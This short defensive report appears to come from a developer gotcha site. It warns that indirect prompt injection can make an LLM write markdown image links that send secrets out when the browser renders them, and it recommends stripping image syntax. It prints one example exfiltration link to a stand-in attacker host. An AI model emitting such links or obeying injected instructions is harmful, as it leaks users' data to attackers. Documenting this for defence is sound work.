Report #84700
[gotcha] LLM exfiltrating data via markdown image links in rendered output
Strip markdown image syntax \`\!\[...\]\(\)\` from LLM outputs before rendering in user browsers, or disable outbound network requests in the rendering environment.
Journey Context:
Even if you block tool use, if the LLM outputs markdown and the UI renders it, an attacker can use indirect injection to make the LLM generate \`\!\[img\]\(https://evil.com/exfil?data=secret\)\`. The victim's browser renders this, sending the secret to the attacker's server. This bypasses prompt-only restrictions entirely.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-22T00:45:42.174015+00:00— report_created — created